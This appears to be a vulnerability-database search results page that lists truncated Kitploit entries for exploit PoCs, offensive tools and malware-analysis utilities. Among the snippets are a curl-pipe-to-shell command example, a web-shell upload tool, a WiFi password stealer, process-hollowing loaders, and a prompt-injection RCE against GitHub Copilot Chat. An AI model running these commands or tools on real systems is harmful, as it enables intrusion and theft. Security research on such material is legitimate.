Lucene search
+L

494829 matches found

Kitploit
Kitploit
•added 2026/09/24 5:34 a.m.•50 views

concealed_code_execution

Concealed Code Execution Hunt& Hackett presents a set of tools and technical write-ups describing attacking techniques that rely on concealing code execution on Windows. Here you will find explanations of how these techniques work, receive advice on detection, and get sample source code for testi...

6.2AI score
SaveExploits0References4
Kitploit
Kitploit
•added 2026/09/24 5:34 a.m.•6 views

POC-CVE-2021-22204

POC-CVE-2021-22204 https://nvd.nist.gov/vuln/detail/CVE-2021-22204 Este es solo un script de conveniencia que escribí para pruebas. Salida root@kitploit: Usage ./buildimage.pl Note: if your cmd contains unix special characters use quote! EG: ./buildimage.pl "curl xxxx.com/script.sh|sh" This poc...

7.8CVSS7.8AI score0.99981EPSS
SaveExploits39
Kitploit
Kitploit
•added 2026/09/24 5:34 a.m.•15 views

flar

flar FLAR is the Fast Light Agent Restrictor. It runs on rocks called gars. It is a simple, lightweight CLI tool in Go to run coding agent CLIs like Claude Code, Antigravity, Codex, Copilot and Reasonix safely inside isolated Bubblewrap bwrap sandboxes. The purpose is to instantly and without...

6.1AI score
SaveExploits0References1
Kitploit
Kitploit
•added 2026/09/24 5:31 a.m.•12 views

Magento-ver.-2.4.6

Título del exploit: FireBear Studio Improved Import & Export ver. 3.8.6 para Magento 2.4.6 - Inyección XSLT del lado del servidor Fecha: 2023-11-17 Autor del exploit: tmrswrr Página web del proveedor: FireBear Studio Enlace del software: FireBear Studio Improved Import & Export Versión: FireBear...

6AI score
SaveExploits0
Kitploit
Kitploit
•added 2026/09/24 5:31 a.m.•8 views

CVE-2023-34960

CVE-2023-34960 Chamilo Command Injection with auto upload shell. use ur logic check path directory at your result vuln, then you can find your access shells wso.php To Install & Execute root@kitploit: $ git clone https://github.com/Mantodkaz/CVE-2023-34960 $ cd CVE-2023-34960 $ pip install -r...

9.8CVSS8.6AI score0.99325EPSS
SaveExploits9References1
Kitploit
Kitploit
•added 2026/09/24 5:30 a.m.•7 views

PichichiH0ll0wer

PichichiH0ll0wer PichichiH0ll0wer About Features Injection methods Installation Usage Credits About --== Process hollowing loader written in Nim for PEs only ==-- I built PichichiH0ll0wer to learn and contribute, sure. but also because I'm quite tired of shellcodes everywhere. Loading PEs might b...

6.2AI score
SaveExploits0
Kitploit
Kitploit
•added 2026/09/24 5:29 a.m.•53 views

makin

I create makin to make initial malware assessment little bit easier for me, I think it's useful for others as well, It helps to reveal a debugger detection techniques used by a sample. Any feedback is greatly appreciated: @qazqaz How does it work? makin opens a sample as a debuggee and injects...

5.9AI score
SaveExploits0References2
Kitploit
Kitploit
•added 2026/09/24 5:29 a.m.•11 views

makin

我创建了 makin 是为了让初始恶意软件评估对我来说稍微容易一些,我认为它对其他人也很有用,它有助于揭示样本使用的调试器检测技术。 非常感谢任何反馈:@qazqaz 它是如何工作的? makin 将样本作为被调试进程打开,并注入 asho.dll(主模块在注入前重命名所有 dll),asho.dll 钩住了 ntdll.dll 和 kernelbase.dll 库中的几个函数,在参数检查之后,它会将相应的消息发送给调试器(makin.exe)。 makin 还会为 IDA Pro 生成一个脚本,用于在检测到的 API 处设置断点。 目前,makin 可以揭示以下技术: ntdll.dl...

5.8AI score
SaveExploits0References2
Kitploit
Kitploit
•added 2026/09/24 5:28 a.m.•13 views

CVE-2023-49313

CVE-2023-49313 Una vulnerabilidad de inyección de dylib en XMachOViewer 0.04 permite a los atacantes comprometer la integridad. Al explotarla, se puede inyectar código no autorizado en los procesos del producto, lo que potencialmente conduce al control remoto y al acceso no autorizado a datos...

9.8CVSS8.6AI score0.0132EPSS
SaveExploits2
Kitploit
Kitploit
•added 2026/09/24 5:26 a.m.•11 views

CVE-2022-27414

CVE-2022-27414 - Inyección SQL College Website CMS v1.0 - CVE-2022-27414 - Inyección SQL URL del CVE root@kitploit: https://vulners.com/cve/CVE-2022-27414 PoC a continuación Código vulnerable comienza en la línea 9 de "cwms\departments\index.php" root@kitploit: query"SELECT FROM departmentlist...

6AI score
SaveExploits1
Kitploit
Kitploit
•added 2026/09/24 5:24 a.m.•8 views

WiFi-password-stealer

WiFi password stealer Have you ever seen a movie where a hacker plugs a seemingly ordinary USB drive into a computer and instantly steals data? Today, you'll be building a device that does exactly that. ⚠️ Disclaimer : All content in this project is intended for security research purposes only...

5.9AI score
SaveExploits0References16
Kitploit
Kitploit
•added 2026/09/24 5:24 a.m.•10 views

automatic-api-attack-tool

自动 API 攻击工具 Imperva 的可定制 API 攻击工具将 API 规范作为输入,并基于该规范生成并运行攻击作为输出。 该工具能够解析 API 规范,并根据 API 规范中定义的内容创建模糊测试攻击场景。每个端点都会被注入根据规范边界内生成的巧妙值,以及边界之外的值,然后发送相应的请求,并详细报告其成功或失败。您还可以扩展它以运行各种安全攻击向量,例如非法资源访问、XSS、SQLi 和 RFI,这些攻击针对现有端点,甚至不存在的端点。 无需人工干预。只需运行工具即可获取结果。 该工具可以轻松扩展以满足各种需求,例如针对想要测试其 API 的开发者,或希望对其公共 API...

6AI score
SaveExploits0
Kitploit
Kitploit
•added 2026/09/24 5:22 a.m.•14 views

ClickOnceBlobber

ClickOnce AppDomainManager Injection Toolkit Weaponize signed .NET ClickOnce applications for initial access by hijacking a dependency DLL via AppDomainManager injection and loading a C port of ProxyBlob Agent. Ships with a C port of ProxyBlob — a SOCKS5 proxy that tunnels all traffic through Azu...

6.1AI score
SaveExploits0References3
Kitploit
Kitploit
•added 2026/09/24 5:22 a.m.•11 views

cve-2019-6453-poc

CVE-2019-6453: RCE en mIRC 7.55 mediante inyección de argumentos a través de manejadores de protocolo URI personalizados Encontramos una vulnerabilidad de ejecución remota de código en mIRC a través del manejador de protocolo URI irc://. Debido a que mIRC no usa ningún tipo de sigilo como -- para...

8.1CVSS7.9AI score0.54292EPSS
SaveExploits8
Kitploit
Kitploit
•added 2026/09/24 5:22 a.m.•13 views

VMInjector

V M I n j e c t o r root@kitploit: c 2012 by Marco Batista Licensed under GPLv3 see LICENSE file Overview: VMInjector is a tool designed to bypass OS login authentication screens of major operating systems running on VMware Workstation/Player, by using direct memory manipulation. Description:...

6.1AI score
SaveExploits0
Kitploit
Kitploit
•added 2026/09/24 5:20 a.m.•12 views

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

InSAT MasterSCADA BUK-TS - RCE sin autenticación CVE-2026-22553 | CVSS 9.8 Crítico | Autor del exploit: Mohammed Idrees Banyamer 📝 Descripción InSAT MasterSCADA BUK-TS sufre una vulnerabilidad de inyección de comandos del sistema operativo sin autenticación en la interfaz web MMadmServ. Esta fall...

9.8CVSS8.3AI score0.01459EPSS
SaveExploits1
Kitploit
Kitploit
•added 2026/09/24 5:20 a.m.•7 views

CVE-2026-48800-PoC

CVE-2026-48800 — PoC de Ejecución de Código Arbitrario en Notepad++ Gravedad: Alta | Afectado: Notepad++ ≤ 8.9.6 | Parcheado: v8.9.6.1 Un script PoC para CVE-2026-48800, una vulnerabilidad de ejecución de código arbitrario en Notepad++ ≤ 8.9.6 a través de shortcuts.xml. Para detalles técnicos...

7.8CVSS7.7AI score0.0062EPSS
SaveExploits7References2
Kitploit
Kitploit
•added 2026/09/24 5:20 a.m.•8 views

PoC-CVE-2025-62222

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE This repository contains a Proof of Concept PoC for the vulnerability CVE-2025-62222. It demonstrates how Remote Code Execution RCE can be achieved on a developer's machine by manipulating the context of GitHub Copilot Chat in VS Code via hidden promp...

8.8CVSS7.1AI score0.00749EPSS
SaveExploits0
Kitploit
Kitploit
•added 2026/09/24 5:19 a.m.•71 views

burp-dom-scanner

Burp DOM Scanner It's a Burp Suite's extension to allow for recursive crawling and scanning of Single Page Applications. It runs a Chromium browser to scan the webpage for DOM-based XSS. It can also collect all the requests XHR, fetch, websockets, etc issued during the crawling allowing them to b...

5.5AI score
SaveExploits0References2
Kitploit
Kitploit
•added 2026/09/24 5:14 a.m.•13 views

CVE-2024-27956

CVE-2024-27956 Nota Construye wordpress: docker-compose -f stack.yml up Instala el plugin: 1. Panel de WordPress, elige Plugins Añadir nuevo 2. Haz clic en Subir plugin 3. Elige Archivo - wp-automatic.zip - Instalar ahora 4. Cuando la instalación haya terminado, haz clic en Activar plugin Exploit...

9.9CVSS8.9AI score0.94057EPSS
SaveExploits16
Rows per page
Query Builder